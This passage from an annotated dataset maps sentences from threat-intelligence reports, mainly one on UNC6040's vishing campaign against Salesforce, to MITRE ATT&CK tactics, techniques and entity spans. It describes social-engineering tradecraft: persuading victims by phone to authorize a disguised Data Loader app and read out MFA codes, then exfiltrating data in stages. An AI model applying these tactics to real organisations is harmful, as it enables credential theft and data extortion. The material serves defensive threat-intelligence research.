"label": "Action" }, { "text": "approve a version of the Data Loader app ", "start": 101, "end": 142, "label": "Action" }, { "text": "name or branding that differs from the legitimate version.", "start": 149, "end": 207, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s29-e0f08b", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version.", "sentence_text": "This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Gains access to query and exfiltrate sensitive Salesforce data", "entities": [ { "text": "UNC6040", "start": 31, "end": 38, "label": "ThreatActor" }, { "text": "access, query, and exfiltrate sensitive information", "start": 67, "end": 118, "label": "Action" }, { "text": " compromised Salesforce customer environments.", "start": 136, "end": 182, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s30-b89886", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments.", "sentence_text": "This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Abuses Data Loader functionalities via malicious connected apps", "entities": [ { "text": "abusing Data Loader functionalities ", "start": 20, "end": 56, "label": "Action" }, { "text": "malicious connected apps", "start": 60, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "Salesforce environments", "start": 179, "end": 202, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s31-d20082", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats.", "sentence_text": "UNC6040\nGTIG is currently tracking a significant portion of the investigated activity as UNC6040.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Conducts significant portion of investigated Salesforce compromise activity", "entities": [ { "text": "UNC6040", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "UNC6040.", "start": 89, "end": 97, "label": "ThreatActor" }, { "text": "significant portion of the investigated activity ", "start": 37, "end": 86, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s32-e6f45f", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "UNC6040\nGTIG is currently tracking a significant portion of the investigated activity as UNC6040.", "sentence_text": "UNC6040 is a financially motivated threat cluster that accesses victim networks by voice phishing social engineering.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Accesses victim networks via voice phishing social engineering", "entities": [ { "text": "UNC6040", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "financially motivated", "start": 13, "end": 34, "label": "Action" }, { "text": "accesses victim networks", "start": 55, "end": 79, "label": "Action" }, { "text": "voice phishing social engineering.", "start": 83, "end": 117, "label": "MalwareTool" }, { "text": "social engineering.", "start": 98, "end": 117, "label": "MalwareTool" } ] }, { "uid": "mitre-99_mitre_report-p1-s33-169c27", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "UNC6040 is a financially motivated threat cluster that accesses victim networks by voice phishing social engineering.", "sentence_text": "Upon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Immediately exfiltrates Salesforce data using Data Loader application", "entities": [ { "text": "UNC6040", "start": 23, "end": 30, "label": "ThreatActor" }, { "text": "immediately exfiltrating data", "start": 49, "end": 78, "label": "Action" }, { "text": "Salesforce environment", "start": 97, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "Salesforce’s Data Loader application.", "start": 126, "end": 163, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s34-fcabd9", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "Upon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application.", "sentence_text": "Attacker Infrastructure\nUNC6040 utilized infrastructure to access Salesforce applications that also hosted an Okta phishing panel.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Utilizes infrastructure hosting both Salesforce access and Okta phishing panels", "entities": [ { "text": "UNC6040", "start": 24, "end": 31, "label": "ThreatActor" }, { "text": "Salesforce applications", "start": 66, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "Okta phishing panel.", "start": 110, "end": 130, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s35-70b9b9", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Attacker Infrastructure\nUNC6040 utilized infrastructure to access Salesforce applications that also hosted an Okta phishing panel.", "sentence_text": "This panel was used to trick victims into visiting it from their mobile phones or work computers during the social engineering calls.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Directs victims to Okta phishing panel during social engineering calls", "entities": [ { "text": " mobile phones or work computers", "start": 64, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "social engineering calls.", "start": 108, "end": 133, "label": "Action" }, { "text": "social engineering", "start": 108, "end": 126, "label": "MalwareTool" }, { "text": "panel was used to trick victims into visiting it ", "start": 5, "end": 54, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s36-e98338", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "This panel was used to trick victims into visiting it from their mobile phones or work computers during the social engineering calls.", "sentence_text": "In these interactions, UNC6040 also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1111", "name": "Multi-Factor Authentication Interception" } ], "procedure": "Directly requests credentials and MFA codes to add malicious Salesforce Data Loader", "entities": [ { "text": "UNC6040", "start": 23, "end": 30, "label": "ThreatActor" }, { "text": "directly requested user credentials", "start": 36, "end": 71, "label": "Action" }, { "text": "multifactor authentication codes", "start": 76, "end": 108, "label": "Action" }, { "text": "authenticate and add the Salesforce Data Loader application", "start": 112, "end": 171, "label": "Action" }, { "text": "facilitating data exfiltration.", "start": 173, "end": 204, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s37-0450c4", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "In these interactions, UNC6040 also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.", "sentence_text": "Alongside the phishing infrastructure, UNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Uses Mullvad VPN IPs for data exfiltration from Salesforce environments", "entities": [ { "text": "UNC6040", "start": 39, "end": 46, "label": "ThreatActor" }, { "text": "Mullvad VPN IP addresses", "start": 62, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "access and perform the data exfiltration", "start": 90, "end": 130, "label": "Action" }, { "text": "victim’s Salesforce environments", "start": 138, "end": 170, "label": "Infrastructure_Indicator" }, { "text": "other services of the victim's network.", "start": 175, "end": 214, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s38-880b8e", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Alongside the phishing infrastructure, UNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network.", "sentence_text": "Overlap with Groups Linked to “The Com” GTIG has observed infrastructure across various intrusions that shares characteristics with elements previously linked to UNC6040 and threat groups suspected of ties to the broader, loosely organized collective known as \" The Com \" .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Shares infrastructure with groups linked to 'The Com' collective", "entities": [ { "text": "UNC6040", "start": 162, "end": 169, "label": "ThreatActor" }, { "text": "The Com ", "start": 262, "end": 270, "label": "ThreatActor" }, { "text": "The Com", "start": 31, "end": 38, "label": "ThreatActor" }, { "text": "infrastructure across various intrusions", "start": 58, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "shares characteristics", "start": 104, "end": 126, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s39-731c63", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Overlap with Groups Linked to “The Com” GTIG has observed infrastructure across various intrusions that shares characteristics with elements previously linked to UNC6040 and threat groups suspected of ties to the broader, loosely organized collective known as \" The Com \" .", "sentence_text": "It's plausible that these similarities stem from associated actors operating within the same communities, rather than indicating a direct operational relationship between the threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s40-b20938", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "It's plausible that these similarities stem from associated actors operating within the same communities, rather than indicating a direct operational relationship between the threat actors.", "sentence_text": "It offers both a user interface and a command-line component, the latter providing extensive customization and automation capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s41-498c15", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "It offers both a user interface and a command-line component, the latter providing extensive customization and automation capabilities.", "sentence_text": "The application supports OAuth and allows for direct \"app\" integration via the \"connected apps\" functionality in Salesforce.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Uses OAuth and connected apps functionality for Salesforce integration", "entities": [ { "text": "OAuth", "start": 25, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "connected apps", "start": 80, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "Salesforce.", "start": 113, "end": 124, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s42-0ecb91", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "The application supports OAuth and allows for direct \"app\" integration via the \"connected apps\" functionality in Salesforce.", "sentence_text": "Threat actors abuse this by persuading a victim over the phone to open the Salesforce connect setup page and enter a \"connection code,\" thereby linking the actor-controlled Data Loader to the victim's environment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Persuades victims to enter connection codes for actor-controlled Data Loader", "entities": [ { "text": "persuading a victim over the phone", "start": 28, "end": 62, "label": "Action" }, { "text": "open the Salesforce connect setup page", "start": 66, "end": 104, "label": "Action" }, { "text": " enter a \"connection code,", "start": 108, "end": 134, "label": "Action" }, { "text": "actor-controlled Data Loader", "start": 156, "end": 184, "label": "Infrastructure_Indicator" }, { "text": "victim's environment.", "start": 192, "end": 213, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s43-af0c07", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "Threat actors abuse this by persuading a victim over the phone to open the Salesforce connect setup page and enter a \"connection code,\" thereby linking the actor-controlled Data Loader to the victim's environment.", "sentence_text": "Modifications", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s44-9906c6", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Modifications", "sentence_text": "In some of the intrusions using Data Loader, threat actors utilized modified versions of Data Loader to exfiltrate Salesforce data from victim organizations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Utilizes modified Data Loader versions for Salesforce data exfiltration", "entities": [ { "text": "Data Loader", "start": 32, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "threat actors", "start": 45, "end": 58, "label": "ThreatActor" }, { "text": "utilized modified versions ", "start": 59, "end": 86, "label": "Action" }, { "text": " victim organizations.", "start": 135, "end": 157, "label": "Infrastructure_Indicator" }, { "text": " exfiltrate Salesforce data", "start": 103, "end": 130, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s45-9f7209", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "In some of the intrusions using Data Loader, threat actors utilized modified versions of Data Loader to exfiltrate Salesforce data from victim organizations.", "sentence_text": "The proficiency with the tool and capabilities by executed queries seems to differ from one intrusion to another.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s46-de56b8", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "The proficiency with the tool and capabilities by executed queries seems to differ from one intrusion to another.", "sentence_text": "In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "Uses small chunk sizes for data exfiltration from Salesforce", "entities": [ { "text": "small chunk sizes for data exfiltration", "start": 37, "end": 76, "label": "Action" }, { "text": "Salesforce", "start": 82, "end": 92, "label": "Infrastructure_Indicator" }, { "text": " retrieve approximately 10% of the data", "start": 113, "end": 152, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s47-7d8e9a", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation.", "sentence_text": "In another case, numerous test queries were made with small chunk sizes initially.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1580", "name": "Cloud Infrastructure Discovery" } ], "procedure": "Conducts test queries with small chunk sizes for reconnaissance", "entities": [ { "text": "test queries", "start": 26, "end": 38, "label": "Action" }, { "text": "small chunk sizes initially.", "start": 54, "end": 82, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s48-73f0b8", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "In another case, numerous test queries were made with small chunk sizes initially.", "sentence_text": "Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "Rapidly increases exfiltration volume after reconnaissance phase", "entities": [ { "text": "rapidly increased the exfiltration volume ", "start": 52, "end": 94, "label": "Action" }, { "text": "extract entire tables.", "start": 97, "end": 119, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s49-efbd51", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables.", "sentence_text": "There were also cases where the threat actors configured their Data Loader application with the name \"My Ticket Portal\", aligning the tool's appearance with the social engineering pretext used during the vishing calls.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Configures Data Loader with pretext-aligned names like 'My Ticket Portal'", "entities": [ { "text": "Data Loader application", "start": 63, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "My Ticket Portal", "start": 102, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "aligning the tool's appearance with the social engineering pretext", "start": 121, "end": 187, "label": "Action" } ] }, { "uid": "mitre-99_mitre_report-p1-s50-5bb967", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "There were also cases where the threat actors configured their Data Loader application with the name \"My Ticket Portal\", aligning the tool's appearance with the social engineering pretext used during the vishing calls.", "sentence_text": "Outlook & Implications Voice phishing (vishing) as a social engineering method is not, in itself, a novel or innovative technique; it has been widely adopted by numerous financially motivated threat groups over recent years with varied results.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s51-d270e1", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Outlook & Implications Voice phishing (vishing) as a social engineering method is not, in itself, a novel or innovative technique; it has been widely adopted by numerous financially motivated threat groups over recent years with varied results.", "sentence_text": "However, this campaign by UNC6040 is particularly notable due to its focus on exfiltrating data specifically from Salesforce environments.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Focuses on exfiltrating data specifically from Salesforce environments", "entities": [ { "text": "UNC6040", "start": 26, "end": 33, "label": "ThreatActor" }, { "text": "focus on exfiltrating data ", "start": 69, "end": 96, "label": "Action" }, { "text": "Salesforce environments.", "start": 114, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s52-f24a4c", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "However, this campaign by UNC6040 is particularly notable due to its focus on exfiltrating data specifically from Salesforce environments.", "sentence_text": "Furthermore, this activity underscores a broader and concerning trend: threat actors are increasingly targeting IT support personnel as a primary vector for gaining initial access, exploiting their roles to compromise valuable enterprise data.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Targets IT support personnel as primary initial access vector", "entities": [ { "text": "targeting IT support personnel", "start": 102, "end": 132, "label": "Action" }, { "text": "primary vector for gaining initial access", "start": 138, "end": 179, "label": "Action" }, { "text": "enterprise data.", "start": 227, "end": 243, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-99_mitre_report-p1-s53-32e4d9", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "Furthermore, this activity underscores a broader and concerning trend: threat actors are increasingly targeting IT support personnel as a primary vector for gaining initial access, exploiting their roles to compromise valuable enterprise data.", "sentence_text": "Given the extended time frame between initial compromise and extortion, it is possible that multiple victim organizations and potentially downstream victims could face extortion demands in the coming weeks or months.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s54-232174", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "Given the extended time frame between initial compromise and extortion, it is possible that multiple victim organizations and potentially downstream victims could face extortion demands in the coming weeks or months.", "sentence_text": "To defend against social engineering threats, particularly those abusing tools like Data Loader for data exfiltration, organizations should implement a defense-in-depth strategy.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s55-987805", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "To defend against social engineering threats, particularly those abusing tools like Data Loader for data exfiltration, organizations should implement a defense-in-depth strategy.", "sentence_text": "GTIG recommends the following key mitigations and hardening steps", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s56-b361fc", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "GTIG recommends the following key mitigations and hardening steps", "sentence_text": "This permission allows broad data export capabilities; therefore, its assignment must be carefully controlled.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s57-a5dd68", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "This permission allows broad data export capabilities; therefore, its assignment must be carefully controlled.", "sentence_text": "Manage Access to Connected Applications Rigorously:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s58-c03620", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "Manage Access to Connected Applications Rigorously:", "sentence_text": "Critically, restrict powerful permissions such as \"Customize Application\" and \"Manage Connected Apps\"—which allow users to authorize or install new connected applications—only to essential and trusted administrative personnel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s59-8f5467", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "Critically, restrict powerful permissions such as \"Customize Application\" and \"Manage Connected Apps\"—which allow users to authorize or install new connected applications—only to essential and trusted administrative personnel.", "sentence_text": "Set login ranges and trusted IPs, thereby restricting access to your defined enterprise and VPN networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s60-8b6e1b", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Set login ranges and trusted IPs, thereby restricting access to your defined enterprise and VPN networks.", "sentence_text": "Transaction Security Policies allow you to monitor activities like large data downloads (a common sign of Data Loader abuse) and automatically trigger alerts or block these actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s61-d92959", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Transaction Security Policies allow you to monitor activities like large data downloads (a common sign of Data Loader abuse) and automatically trigger alerts or block these actions.", "sentence_text": "These logs can also be ingested into your internal security tools for broader analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s62-4f01b0", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "These logs can also be ingested into your internal security tools for broader analysis.", "sentence_text": "Enforce Multi-Factor Authentication (MFA) Universally:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s63-1ed634", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "Enforce Multi-Factor Authentication (MFA) Universally:", "sentence_text": "Salesforce states that \"MFA is an essential, effective tool to enhance protection against unauthorized account access\" and requires it for direct logins.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s64-6699eb", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "Salesforce states that \"MFA is an essential, effective tool to enhance protection against unauthorized account access\" and requires it for direct logins.", "sentence_text": "Ensure MFA is robustly implemented across your organization and that users are educated on MFA fatigue tactics and social engineering attempts designed to circumvent this critical protection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s65-5c32cd", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Ensure MFA is robustly implemented across your organization and that users are educated on MFA fatigue tactics and social engineering attempts designed to circumvent this critical protection.", "sentence_text": "By implementing these measures, organizations can significantly strengthen their security posture against the types of vishing and the UNC6040 data exfiltration campaign detailed in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s66-d41a9e", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "By implementing these measures, organizations can significantly strengthen their security posture against the types of vishing and the UNC6040 data exfiltration campaign detailed in this report.", "sentence_text": "Regularly review Salesforce’s security documentation, including the Salesforce Security Guide for additional detailed guidance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s67-1df19b", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "Regularly review Salesforce’s security documentation, including the Salesforce Security Guide for additional detailed guidance.", "sentence_text": "Read our\nvishing technical analysis for more details on the vishing threat, and strategic recommendations and best practices to stay ahead of it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s68-4e1d69", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "Read our\nvishing technical analysis for more details on the vishing threat, and strategic recommendations and best practices to stay ahead of it.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-99_mitre_report-p1-s69-2bd2c6", "source": "mitre", "doc_id": "99_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s1-dd8beb", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Our research unravels how global threat actors adapt and evolve, shedding light on the pressing need for collective defense strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s2-dad06e", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Our research unravels how global threat actors adapt and evolve, shedding light on the pressing need for collective defense strategies.", "sentence_text": "This reflects a convergence of cybercrime and espionage motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s3-792977", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "This reflects a convergence of cybercrime and espionage motivations.", "sentence_text": "Shifting Attribution Challenges : Many campaigns highlighted the increasing difficulty of attribution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s4-7b665f", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Shifting Attribution Challenges : Many campaigns highlighted the increasing difficulty of attribution.", "sentence_text": "This signals a shift in hacktivism’s sophistication and impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-52_SentinelOne_report-p1-s5-a18fc1", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "This signals a shift in hacktivism’s sophistication and impact.", "sentence_text": "Increased Exploitation of Cloud and SaaS Platforms : The growing use of legitimate cloud infrastructure for malicious activities, such as Xeon Sender ’s abuse of SaaS APIs and Visual Studio Code tunneling for command-and-control, underscores the persistent misuse of trusted platforms to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.007", "name": "Serverless" } ], "procedure": "Used cloud infrastructure like SaaS APIs and Visual Studio tunneling for malicious activities", "entities": [ { "text": "Cloud ", "start": 26, "end": 32, "label": "Infrastructure_Indicator" }, { "text": "SaaS Platforms", "start": 36, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "Exploitation ", "start": 10, "end": 23, "label": "Action" }, { "text": "use of legitimate cloud infrastructure for malicious activities", "start": 65, "end": 128, "label": "Action" }, { "text": "Xeon Sender", "start": 138, "end": 149, "label": "ThreatActor" }, { "text": "SaaS APIs", "start": 162, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "Visual Studio Code tunneling", "start": 176, "end": 204, "label": "Infrastructure_Indicator" }, { "text": "command-and-control", "start": 209, "end": 228, "label": "Action" } ] }, { "uid": "sentinel-52_SentinelOne_report-p1-s6-0e28ba", "source": "sentinel", "doc_id": "52_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Increased 